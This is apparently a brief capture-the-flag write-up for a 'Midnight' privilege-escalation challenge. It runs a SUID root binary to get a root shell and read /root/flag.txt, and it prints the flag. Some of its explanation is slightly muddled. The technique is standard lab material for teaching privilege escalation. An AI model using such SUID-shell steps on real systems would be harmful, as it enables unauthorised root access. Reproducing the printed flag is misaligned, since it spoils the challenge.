✨ Privesc - 1

👀 Before you start

You can donate to me via Buy Me a Coffee or follow me on Github

🚩 Getting the Flag

We're coming up against a challenge where we have to do just that:

level1@Midnight:~$ ls -la
total 16
drwxr-xr-x 2 root  root  4096 Mar 15  2024 .
drwxr-xr-x 3 root  root  4096 Mar 15  2024 ..
-rwsr-xr-x 1 root level1 7320 Mar 15  2024 privesc1

We have a binary with suid and s rights for the level1 group.

level1@Midnight:~$ ./privesc1
level1@Midnight:~$

When we run it, nothing happens. This either means that the binary doesn't do anything, or that we're in a new shell.

Let's take a quick look:

level1@Midnight:~$ echo $$
888
level1@Midnight:~$ ./privesc1
level1@Midnight:~$ echo $$
5489

We now have a new shell. Let's see what kind of shell it is:

level1@Midnight:~$ id
uid=1001(level1) gid=1001(level1) euid=0(root) groups=0(root),1001(level1)
level1@Midnight:~$ echo $SHELL
/bin/bash

Okay, we've actually got a new bash with root rights. Now we can read the flag:

level1@Midnight:~$ ./privesc1 -p
level1@Midnight:~$ cat /root/flag.txt
MCTF{Pr1v1l3g3_3sc4l4t10n_1S_4lw4y5_4_B4d_1d34_4nd_4_B4d_3nv1r0nm3nt}

💖 Support

👀 Before you leave

You can donate to me via Buy Me a Coffee or follow me on Github